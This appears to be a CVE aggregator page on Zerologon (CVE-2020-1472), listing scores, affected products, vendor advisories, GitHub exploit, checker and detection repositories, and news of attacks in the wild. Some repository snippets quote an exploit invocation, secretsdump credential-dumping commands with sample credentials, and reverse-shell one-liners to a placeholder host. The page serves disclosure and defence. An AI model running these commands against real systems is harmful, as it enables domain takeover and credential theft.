CVE-2020-1472

Published: 17/08/2020 Updated: 24/12/2020
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Microsoft Windows could allow a remote malicious user to gain elevated privileges on the system, caused by an error when establishing a vulnerable Netlogon secure channel connection to a domain controller. By executing a specially-crafted program, an attacker could exploit this vulnerability to execute arbitrary code with higher privileges.

Vulnerable Product

microsoft windows server 2008 r2

microsoft windows server 2012 -

microsoft windows server 2012 r2

microsoft windows server 2016 -

microsoft windows server 2016 1903

microsoft windows server 2016 1909

microsoft windows server 2016 2004

microsoft windows server 2019 -

fedoraproject fedora 32

fedoraproject fedora 33

opensuse leap 15.1

opensuse leap 15.2

canonical ubuntu linux 14.04

canonical ubuntu linux 16.04

canonical ubuntu linux 18.04

synology directory server

samba samba

Vendor Advisories

Synopsis: Moderate: samba security and bug fix update. Type/Severity: Security Advisory: Moderate. Topic: An update for samba is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base s ...
Debian Bug report logs - #971048 samba: CVE-2020-1472. Package: src:samba; Maintainer for src:samba is Debian Samba Maintainers <pkg-samba-maint@lists.alioth.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org>. Date: Sat, 26 Sep 2020 19:21:02 UTC. Severity: grave. Tags: fixed-upstream, security, upstream ...
Arch Linux Security Advisory ASA-202009-17. Severity: Critical. Date: 2020-09-29. CVE-ID: CVE-2020-1472. Package: samba. Type: access restriction bypass. Remote: Yes. Link: security.archlinux.org/AVG-1236. Summary: The package samba before version 4.13.0-1 is vulnerable to access ...
Debian Bug report logs - #973399 samba: CVE-2020-14323. Package: src:samba; Maintainer for src:samba is Debian Samba Maintainers <pkg-samba-maint@lists.alioth.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org>. Date: Thu, 29 Oct 2020 21:06:05 UTC. Severity: important. Tags: security, upstream. Found in ve ...
Debian Bug report logs - #973398 samba: CVE-2020-14383. Package: src:samba; Maintainer for src:samba is Debian Samba Maintainers <pkg-samba-maint@lists.alioth.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org>. Date: Thu, 29 Oct 2020 21:06:01 UTC. Severity: important. Tags: security, upstream. Found in ve ...
Debian Bug report logs - #973400 samba: CVE-2020-14318. Package: src:samba; Maintainer for src:samba is Debian Samba Maintainers <pkg-samba-maint@lists.alioth.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org>. Date: Thu, 29 Oct 2020 21:09:01 UTC. Severity: important. Tags: security, upstream. Found in ve ...
An issue has been found in Samba 4.0 and later, where an unauthenticated attacker on the network can gain administrator access by exploiting a netlogon protocol flaw, but only when used as domain controller. Since version 4.8 (released in March 2018), the default behaviour of Samba has been to insist on a secure netlogon channel, which is a suff ...

Mailing Lists

Proof of concept exploit for the ZeroLogin Netlogon privilege escalation vulnerability ...
In August, Microsoft patched CVE-2020-1472, which gives administrator access to an unauthenticated user on a Domain Controller. Microsoft gave it a CVSS score of 10. portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1472#ID0EUGAC The Samba security team was not contacted before the announcement, which is very sparse on ...

Github Repositories

CVE-2020-1472 POC. Requires the latest impacket from GitHub with added netlogon structures. Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here. Exploit steps: Read the blog/whitepaper above so

CVE-2020-1472 POC. Requires the latest impacket from GitHub with added netlogon structures. Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! Link to the original research: www.secura.com/blog/zero-logon. Installing Only

CVE-2020-1472 Checker & Exploit Code for CVE-2020-1472 aka Zerologon. Tests whether a domain controller is vulnerable to the Zerologon attack; if vulnerable, it will reset the Domain Controller's account password to an empty string. NOTE: It will likely break things in production environments (e.g. DNS functionality, communication with replication Domain Controller

CVE 2020-1472 validation script

CVE-2020-1472 CVE 2020-1472 validation script. Assumption: WinRM is enabled between domain controllers. Required permissions: If child domains are present: Enterprise admin. If single forest, single domain: Domain admin. This script must be run on a primary domain controller with required permissions. It will recursively query all the domain controllers within the Fores

Enumerate AD through LDAP with a collection of helpful scripts being bundled

ADE - ActiveDirectoryEnum python -m ade usage: ade [-h] [--dc DC] [-o OUT_FILE] [-u USER] [-s] [-smb] [-kp] [-bh] [-spn] [-sysvol] [--all] [--no-creds] [--dry-run] [--exploit EXPLOIT]

A simple implementation/code smash of a bunch of other repos

CVE-2020-1472-Easy This is definitely not something you would want to run on anything that you care about Basically does a zerologon exploit, dumps the hives, extracts the machine password, reinstalls the machine password It seems to work but have not had a lot of time to fully test it Will need the latest impacket to run it Example run /python cve-2020-1472-easymodepy -n

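cve-2020-1472 reproduction, exploitation and its exp

CVE-2020-1472 POC. Reproducing this vulnerability in a Windows domain environment from macOS through a proxychains proxy. Environment DC (primary domain controller): Domain User (domain member host): a socks5 forward proxy is set up directly with gost. Attack Hacker (attacking machine): configure proxychains4 vim /Users/xq17/proxychains/proxychainsconf and add the ProxyList entries [ProxyList] socks5 102115542 8099 Attack Tools(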

https://github.com/dirkjanm/CVE-2020-1472

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon) The attack described here takes advantage of flaws in a cryptographic authentication protocol (insecure use of AES-CFB8) that proves the authenticity and identity of a domain-joined computer to the Domain Controller (DC) Due to incorrect use of an AES mode of operation it is possible to sp

Static standalone binaries for Windows and Linux (both x64) of dirkjanm's CVE-2020-1472 POC Python scripts

ZeroLogon - dirkjanm CVE-2020-1472 static binaries Description This repository contains static standalone binaries for Windows and Linux (both x64) of dirkjanm's CVE-2020-1472 POC Python scripts: cve-2020-1472-exploitexe and restorepasswordexe All credit goes to Tom Tervoort for the original research and Dirk-jan Mollema for the Python scripts The build process is heav

CFB8 Zero IV Attack ❯ python cfb8_zero_iv_attackpy [!] Attack Success Number of trials: 275 Key: b'U\x1e\x9eoKd\x18\xdf\x0c\x05\xfc3\x1f4\xd9\x8e' IV: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Plaintext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Ciphertext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Reference Zerologon: U

Test tool for CVE-2020-1472

ZeroLogon testing script. A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472). It attempts to perform the Netlogon authentication bypass. The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations. When a domain controller is patched, the detection script will gi

Ladon Moudle CVE-2020-1472 Exploit

CVE-2020-1472-EXP Ladon Moudle CVE-2020-1472 Exploit

CVE-2020-1472 vulnerability reproduction process

CVE-2020-1472 CVE-2020-1472 vulnerability reproduction process. For the process in detail, see: blog.csdn.net/mukami0621/article/details/108605941

Script to automate checks for potential exploitation of CVE-2020-1472 (aka ZeroLogon) in the domain. This is a very "quick and dirty" script that automates some of the leading artifacts in determining an actual exploitation of CVE-2020-1472, compiled from multiple blogs. Ideally, the 2nd check (for events from Security & System event logs) can be done from a S

C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

ZeroLogonChecker C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

CVE [+] CVE-2020-1472 | Windows Server Netlogon vul

Awesome Systools is a collection of sysadmins daily handy tools.

Awesome Systools Lists The Book of Secret Knowledge Awesome-Selfhosted: This is a list of Free Software network services and web applications which can be hosted locally Selfhosting is the process of locally hosting and managing applications instead of renting from SaaS providers Lucid Index: This site's goal is to help you find the software you need as quickly as possi

PoC for Zerologon (CVE-2020-1472) - Research credits to Tom Tervoort of Secura & exploit credits to dirkjanm

CVE-2020-1472 - Zero-Logon POC This exploit requires you to use the latest impacket from GitHub Ensure impacket installation is done with netlogon structures added Note : By default, successful exploitation changes the password of the DC Account Allows DCSync Breaks communication with other domain controllers (Be careful!) Original Research & information here

Step 1: pip3 install -r requirementstxt View the hash: secretsdumppy molecule-labscom/administrator:Aa123456@192168175132 -just-dc-user 'AD$' Attack: python3 CVE-2020-1472py AD AD$ 192168175132 Query the domain controller hash: secretsdumppy molecule-labscom/'AD$'@192168175132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 Restore the hash

Collection of C# projects. Useful for pentesting and redteaming.

RedCsharp Offensive C# tools CasperStager PoC for persisting NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls CSExec An implementation of PSExec in C# CSharpCreateThreadExample C# code to run PIC using CreateThread CSharpScripts Collection of C# scripts CSharpSetThreadContext C# Shellcode Runner to execute

zeroscan / masscanning for Zerologon (CVE-2020-1472) Details in our Blog: Zerologon (CVE-2020-1472) finding and checking

https://github.com/Flangvik/SharpCollection

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Please note that Cobalt Strike's execute-assembly only accepts binaries compiled with the "Any CPU"

Check for events that indicate non compatible devices -> CVE-2020-1472

zerologon Check for events that indicate non compatible devices -> CVE-2020-1472

Common Vulnerability Scoring System (CVSS) Version 3

go-cvss - Common Vulnerability Scoring System (CVSS). Importing CVSS vector and scoring. Support CVSS version 3.0 and 3.1. Exporting CVSS information with template string. Sample Code: Base Metrics package main import ( "fmt" "os" "githubcom/spiegel-im-spiegel/go-cvss/v3/metric" ) func main() { bm, err := metricNewBase()Deco

Invoke-ZeroLogon. This code was heavily adapted from the C# implementation by the NCC Group's Full Spectrum Attack Simulation team and the original CVE published by Secura. This script can be run in two modes: When the reset parameter is set to True, the script will attempt to reset the target computer’s password to the default NTLM hash (essentially an empty passwor

CFB8 Zero Bytes Attack ❯ python cfb8_zero_bytes_attackpy [!] Attack Success Number of trials: 275 Key: b'U\x1e\x9eoKd\x18\xdf\x0c\x05\xfc3\x1f4\xd9\x8e' IV: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Plaintext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Ciphertext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Reference Zerolo

Zerologon Exploit | CVE-2020-1472

Zerologon Checker & Exploit Code for CVE-2020-1472. Tests whether a domain controller is vulnerable to the Zerologon attack; if vulnerable, it will reset the Domain Controller's account password to an empty string

Patch and enforcement key assessment for CVE 2020-1472

ZeroLogonAssess Patch and enforcement key assessment for CVE 2020-1472

Command line interface for Kenna API

A CLI for Kenna Platform. Command line interface for Kenna API. This application is created for those who want to get quick information from the Kenna platform. The Kenna Modules Implemented with The API: Vulnerabilities Assets Asset Tagging Asset Groups Asset group reporting Connectors Connector Runs Users Roles Fixes Applications Application Reporting Dashboard Gro

CVE-2020-1472 - Zero Logon vulnerability Python implementation

CVE-2020-1472 CVE-2020-1472 - Zero Logon vulnerability Python implementation

Netlogon Elevation of Privilege Vulnerability | NOPE its a bot

CVE-2020-1472 - Netlogon Elevation of Privilege Vulnerability | NOPE its a bot. It's an educational botnet, use it at your own risk!

Pentest-Tools-Collection Active Directory WinPwn: github.com/S3cur3Th1sSh1t/WinPwn Bloodhound: github.com/BloodHoundAD/BloodHound impacket: github.com/SecureAuthCorp/impacket ADRecon: github.com/sense-of-security/ADRecon Ghostpack: github.com/GhostPack OWA / EWS / O365 Mailsniper: github.com/dafthack/MailSniper ExchangeRelayX: htt

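Summary of intranet penetration topics

Hack_For_Intranet 0x01 Information gathering 1. Common information-gathering commands #ipconfig: ipconfig /all ------> query the local IP range, the domain it belongs to, etc. #net: net user ------> list of local users net localgroup administrators ------> local administrators [usually includes domain users] net user /domain ------> query domain users net group /domain ------> query the domain's work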

zerologon script to exploit CVE-2020-1472 CVSS 10/10

zerologon zerologon script to exploit CVE-2020-1472 CVSS 10/10. Exploit code based on www.secura.com/blog/zero-logon and github.com/SecuraBV/CVE-2020-1472. Original research and scanner by Secura, modifications by RiskSense Inc. github.com/risksense/zerologon To exploit, clear out any previous Impacket installs you have and install Impacket from g

Windows-Internal Notes

Windows-Internal Windows-Internal Notes. Microsoft Active Directory NetLogon Elevation of privilege CVE-2020-1472. Impact: Recent version of Windows Server acting as Active Directory Domain Controllers (DCs). Impact: NetLogon Remote Procedure (MS-NRPC). NetLogon used within Active Directory deployments for authentication of users and machines. NetLogon is leveraged by Microsoft

Exploit Code for CVE-2020-1472 aka Zerologon

CVE-2020-1472 Exploit Code for CVE-2020-1472 aka Zerologon

Collected and packaged py files used when reproducing CVE-2020-1472

CVE-2020-1472 Collected and packaged py files used when reproducing CVE-2020-1472

Zerologon Exploit Script. This script is used to test and exploit unpatched Domain Controllers for the Zerologon Vulnerability (CVE-2020-1472). More information on this vulnerability can be found here: www.secura.com/blog/zero-logon The PoC code for detection was provided by SecuraBV and can be found here: github.com/SecuraBV/CVE-2020-1472 The exploit code has be

CVE-2020-1472

CVE-2020-1472 CVE-2020-1472 exploit source: github.com/dirkjanm/CVE-2020-1472 github.com/SecuraBV/CVE-2020-1472

Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472. Monitors event ID's 5827, 5828 & 5829. See: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

zabbix-template-CVE-2020-1472 Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472. Monitors event ID's 5827, 5828 & 5829. portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

Test script for CVE-2020-1472 for both RPC/TCP and RPC/SMB

Zerologon test for SMB & RPC. A python script based on SecuraBV script. Demonstrates that CVE-2020-1472 can be done via RPC/SMB, and not only over RPC/TCP. Additionally, there is a random byte in the final client challenge & client credential - to test against trivial IDS signatures. The RPC/SMB scan runs by default. Depending on the target server, some may requir

Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Azure DevOps? Each night at 03:00 AM, the Azure DevOps pipeline checks for new commits to all repositories master

Post-compromise AD password reset

Post-compromise AD password reset. Notes copied from us-cert.cisa.gov/ncas/alerts/aa20-283a If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be

Notes Taken for HTB Machine

hackthebox Notes Taken for HTB Machine. Will be periodically updated, created with the intent of unwrapping all possible ways and to prep for exams. Created & maintained by: cyberwr3nch. Contents: Command Reference Tools Bloggers Commands Reference File Contents Active Directory Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcc

Zeek package to detect Zerologon

Zerologon Summary: A Zeek detection package for CVE-2020-1472, also known as Zerologon, which is a CVSS 10.0 privilege escalation vulnerability against the Netlogon protocol for Windows Server domain controllers. Notices: By default, both notices are raised: Zerologon_Attempt indicates the requisite number of login attempts were made within a short period of time. Zerologon_Pass

Intranet penetration tools

caoIntranet Intranet penetration tools ├─信息收集 │ ├─goby-win-x64-16154 │ │ ├─config │ │ │ └─langs │ │ ├─data │ │ │ ├─logs │ │ │ ├─result │ │ │ ├─task │ │ │ └─tmp │ │ ├─golib │ │ │ ├─exploits │ │ │ │ ├─system │ │ │ │ └─user │

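Windows NetLogon privilege escalation vulnerability reproduction (CVE-2020-1472). impacket.zip must be extracted into the current folder. For the detailed process, see the article: mp.weixin.qq.com/s/8rp0k5M2aPSPIXxVuIRMdQ References: github.com/dirkjanm/CVE-2020-1472 github.com/sv3nbeast/CVE-2020-1472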

Protect your domain controllers against Zerologon (CVE-2020-1472).

Set-ZerologonMitigation Protect your domain controllers against Zerologon (CVE-2020-1472)

Microsoft 365 Defender - Resource Hub

Microsoft 365 Defender - Resource Hub Welcome to the Microsoft 365 Defender Resource Hub Update! as the list of Microsoft 365 Defender resources keeps growing I am highlighting additions Become a Microsoft Defender ATP Ninja Security Community Webinars On-demand webcast series: “Tracking the adversary” Microsoft 365 Security for IT Pros A must have

Automate installation of extra pentest tools on Kali Linux

WeaponizeKali.sh is a Bash script aimed at automating the process of downloading and installing extra tools for internal penetration tests on Kali Linux. Basic principles behind this project are: Use bleeding-edge versions of offensive toolkits to possess their latest features and fixes. When installing 3rd party software, use isolated environments to minimize potential depend

Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.

CSIRT *Please contribute through pull requests- ;) Another great list: awesome-incident-response. Books: Nice list here by CertBR, Practical Cryptography for Developers, github, The Book of Secret Knowledge, Security Engineering — Third Edition, The Cyber Plumber's Handbook. Links: FIRST, CertBR - useful links, 7º Fórum Brasileiro de CSIRTs, 9º Fó

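Record of articles read online in 2020

Penetration: Seagate Central Storage remote code execution 0-day; NSA firmware vulnerability discovery; SKF labs: GraphQL errors, JWT, SSRF, SSTI vulnerability environments, can be used together with the github.com/D0g3-Lab/H1ve vulnerability environment; hydra usage: new usage, cracking passwords in combination with a tor proxy; stealing NTLMv2 hashes by abusing SQL injection in a file download feature; obtaining the NTLMv2 hash value through injection; persistence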

Powershell tool to automate Active Directory enumeration.

adPEAS adPEAS is a Powershell tool to automate Active Directory enumeration In fact, adPEAS is like a wrapper for different other cool projects like PowerView Empire Bloodhound and some own written lines of code As said, adPEAS is a wrapper for other tools They are almost all written in pure Powershell but some of them are included as compressed binary blob or C# code How

PENTESTING-BIBLE. Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY. Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDS.dit: www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: www.hackingarticles.in/3-ways-to-captu

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready to use code for red teaming *References: githubcom/GhostPack githubcom/rootm0s/WinPwnage githubcom/0xbadjuju/WheresMyImplant githubcom/hfiref0x/UACME githubcom/RhinoSecurityLabs/Aggressor-Scripts pentestmagcom/simpleshellcodeinjector-ssi/ Exploits krbtgtpw/dacl-permis

Pentester's Promiscuous Notebook. Use your Ctrl-F to navigate around

snovvcrash’s Security Blog TOC {:toc} Reverse Shells securixykz/hack-faq/reverse-shell-ili-bjekkonnekthtml/ Bash root@kali:$ bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 root@kali:$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f Net

Active Directory Kill Chain Attack & Defense. Summary: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Mo

CVEs enumerated by FireEye that should be addressed to limit the effectiveness of the leaked Red Team tools: CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0; CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 10.0; CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN

vFeed CVEs Vulnerability Indicators that should be addressed to limit the effectiveness of the Leaked FireEye Red Team tools: CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0; CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 10.0; CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Forti

Awesome Hacking Awesome hacking is a curated list of hacking tools for hackers, pentesters and security researchers Its goal is to collect, classify and make awesome tools easy to find by humans, creating a toolset you can checkout and update with one command This is not only a curated list, it is also a complete and updated toolset you can download with one-command! You can

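Penetration_Testing_POC: a collection of POCs, scripts, tools, articles and other techniques used in penetration testing, shared as notes; additions are welcome. Penetration_Testing_POC Please make good use of search [Ctrl+F] IOT Device&Mobile Phone Web APP Privilege escalation helpers PC tools - collection of small tools Articles/books/tutorials Notes Please make good use of search [Ctrl+F] IOT Device&Mobile

Summary of all security news published to the Alpha Lab WeChat official account in 2020

Welcome to follow the Alpha Lab WeChat official account 20201231 [Vulnerability] The 10 most critical CVEs added in 2020 blog.detectify.com/2020/12/30/top-10-critical-cves-added-in-2020/ UAF vulnerability in Chromium RawClipboardHostImpl bugs.chromium.org/p/chromium/issues/detail?id=1101509 [Tool] Sarenka: an OSINT tool that gathers data from services such as shodan and censys in one place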

PoC in GitHub 2020 CVE-2020-0014: It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Android-10. Android ID: A-1286745

PoC in GitHub 2020 CVE-2020-0014 (2020-02-13): It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Android-10. Android

PoC auto collect from GitHub.

PoC in GitHub 2020 CVE-2020-0022: In reassemble_and_dispatch of packet_fragmenter.cc, there is possible out of bounds write due to an incorrect bounds calculation. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Andr

Recent Articles

Threat Landscape Trends – Q3 2020
Symantec Threat Intelligence Blog • Threat Hunter Team • 18 Dec 2021

A look at the cyber security trends from the third quarter of 2020.

Posted: 18 Dec, 2020. 3 min read. We took a look through telemetry from our vast range of data sources and selected some of the trends that stood out from July, August, and September 2020.

From significant increases in Emotet and Cobalt Strike activity to a spike in the number of server vulnerability exploit at...

Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign
Symantec Threat Intelligence Blog • Threat Hunter Team • 17 Nov 2021

Evidence that advanced persistent threat group Cicada is behind attack campaign targeting companies in 17 regions and multiple sectors.

Posted: 17 Nov, 2020 • 8 Min Read

A large-scale attack campaign is targeting multiple Japanese companies, including subsidiaries located in as many as 17 regions around the globe in a likely intelligence-ga...

QNAP patches QTS vulnerabilities allowing NAS device takeover
BleepingComputer • Sergiu Gatlan • 07 Dec 2020

Network-attached storage (NAS) maker QNAP today released security updates to address vulnerabilities that could enable attackers to take control of unpatched NAS devices following successful exploitation.
The eight
by QNAP affect all QNAP NAS devices running vulnerable software.
These
and
(XSS) security bugs the company rated as medium and high severity security issues.
The XSS vulnerabilities could allow remote attackers to inject malicious code within ...

Critical MobileIron RCE Flaw Under Active Attack
Threatpost • Lindsey O'Donnell • 25 Nov 2020

Advanced persistent threat (APT) groups are actively exploiting a vulnerability in mobile device management security solutions from MobileIron, a new advisory warns.
The issue in question (CVE-2020-15505) is a remote code-execution flaw. It ranks 9.8 out of 10 on the CVSS severity scale, making it critical. The flaw was patched back in June, however, a proof of concept (PoC) exploit became available in September. Since then, both hostile state actors and cybercriminals have attempted to ex...

IT threat evolution Q3 2020. Non-mobile statistics
Securelist • Victor Chebyshev Fedor Sinitsyn Denis Parinov Oleg Kupreev Evgeny Lopatin Alexey Kulaev Alexander Kolesnikov • 20 Nov 2020

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
According to Kaspersky Security Network, in Q3:
In Q3 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 146,761 users.

APT Exploits Microsoft Zerologon Bug: Targets Japanese Companies
Threatpost • Elizabeth Montalbano • 19 Nov 2020

China-backed APT Cicada joins the list of threat actors leveraging the Microsoft Zerologon bug to stage attacks against their targets. In this case, victims are large and well-known Japanese organizations and their subsidiaries, including locations in the United States.
Researchers observed a “large-scale attack campaign targeting multiple Japanese companies” across 17 regions and various industry sectors that engaged in a range of malicious activity, such as credential theft, data exf...

Fake Microsoft Teams updates lead to Cobalt Strike deployment
BleepingComputer • Ionut Ilascu • 09 Nov 2020

Ransomware operators are using malicious fake ads for Microsoft Teams updates to infect systems with backdoors that deployed Cobalt Strike to compromise the rest of the network.
The attacks target organizations in various industries, but recent ones focused on the education sector (K-12), which depends on videoconferencing solutions due to Covid-19 restrictions.
In a non-public security advisory seen by BleepingComputer, Microsoft is warning its customers about these FakeUpdates camp...

Microsoft Warns Threat Actors Continue to Exploit Zerologon Bug
Threatpost • Elizabeth Montalbano • 30 Oct 2020

Threat attackers continue to exploit the Microsoft Zerologon vulnerability, a situation that’s been a persistent worry to both the company and the U.S. government over the last few months. Both on Thursday renewed their pleas to businesses and end users to update Windows systems with a patch Microsoft released in August to mitigate attacks.
Despite patching awareness efforts, Microsoft said it is still receiving “a small number of reports from customers and others” about active exp...

Microsoft warns of ongoing attacks using Windows Zerologon flaw
BleepingComputer • Sergiu Gatlan • 29 Oct 2020

Microsoft today warned that threat actors are continuing to actively exploit systems unpatched against the ZeroLogon privilege escalation vulnerability in the Netlogon Remote Protocol (MS-NRPC).
"Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020," MSRC VP of Engineering Aanchal Gupta sa...

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser
Fireeye Threat Research • by Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock • 28 Oct 2020

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.
The malware families ena...

QNAP warns of new QTS bugs that allow take over of devices
BleepingComputer • Ionut Ilascu • 28 Oct 2020

QNAP today announced two vulnerabilities affecting QTS, the operating system powering its network-attached storage devices, that could allow running arbitrary commands.
The bugs are remotely exploitable and have been reported in versions of the software released before September 8, 2020.
The network-attached storage (NAS) device vendor does not provide too many details about the two issues but says that recent QTS releases include the necessary patches.
According to QNAP’s ...

Attackers chain Windows, VPN flaws to target US government agencies
welivesecurity • 13 Oct 2020

Threat actors have been chaining vulnerabilities in Windows and Virtual Private Network (VPN) services to target various government agencies, critical infrastructure and election organizations, according to a warning by the United States’ Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI). The technique, which involves exploiting several flaws over the course of a single attack to infiltrate an organization’s network, is part of the gangs’ ram...

October Patch Tuesday: Microsoft Patches Critical, Wormable RCE Bug
Threatpost • Tara Seals • 13 Oct 2020

Microsoft has pushed out fixes for 87 security vulnerabilities in October – 11 of them critical – and one of those is potentially wormable.
There are also six bugs that were previously unpatched but publicly disclosed, which could give cybercriminals a leg up — and in fact at least one public exploit is already circulating for this group.
This month’s Patch Tuesday overall includes fixes for bugs in Microsoft Windows, Office and Office Services and Web Apps, Azure Functions, ...

Election Systems Under Attack via Microsoft Zerologon Exploits
Threatpost • Lindsey O'Donnell • 13 Oct 2020

U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft’s severe privilege-escalation flaw, dubbed “Zerologon,” to target elections support systems.
Days after Microsoft sounded the alarm that an Iranian nation-state actor was actively exploiting the flaw (CVE-2020-1472), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.

Ransomware gang now using critical Windows flaw in attacks
BleepingComputer • Ionut Ilascu • 09 Oct 2020

Microsoft is warning that cybercriminals have started to incorporate exploit code for the ZeroLogon vulnerability in their attacks. The alert comes after the company noticed ongoing attacks from cyber-espionage group MuddyWater (SeedWorm) in the second half of September.
This time, the threat actor is TA505, an adversary who is indiscriminate about the victims it attacks, with a 
 starting with the distribution of Dridex banking trojan in 2014.
Over the years, the actor...

Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors
Threatpost • Lindsey O'Donnell • 06 Oct 2020

Microsoft is warning that an Iranian nation-state actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.
The advanced persistent threat (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) has historically targeted government victims in the Middle East to exfiltrate data. Exploiting the bug allows an unauthenticated attacker, with network access ...

Microsoft: Iranian hackers actively exploiting Windows Zerologon flaw
BleepingComputer • Sergiu Gatlan • 05 Oct 2020

Microsoft today warned that the Iranian-backed MuddyWater cyber-espionage group was observed using ZeroLogon exploits in multiple attacks during the last two weeks.
The ongoing attacks exploiting the critical 10/10 rated CVE-2020-1472 security flaw were spotted by Microsoft's Threat Intelligence Center.
"MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks," Microsoft
earlier to...

Zerologon Attacks Against Microsoft DCs Snowball in a Week
Threatpost • Tara Seals • 29 Sep 2020

A spike in exploitation attempts against the Microsoft vulnerability CVE-2020-1472, known as the Zerologon bug, continues to plague businesses.
That’s according to researchers from Cisco Talos, who warned that cybercriminals are redoubling their efforts to trigger the elevation-of-privilege bug in the Netlogon Remote Protocol, which was addressed in the August Microsoft Patch Tuesday report. Microsoft announced last week that it had started observing active exploitation in the wild: “W...

Microsoft clarifies patch confusion for Windows Zerologon flaw
BleepingComputer • Sergiu Gatlan • 29 Sep 2020

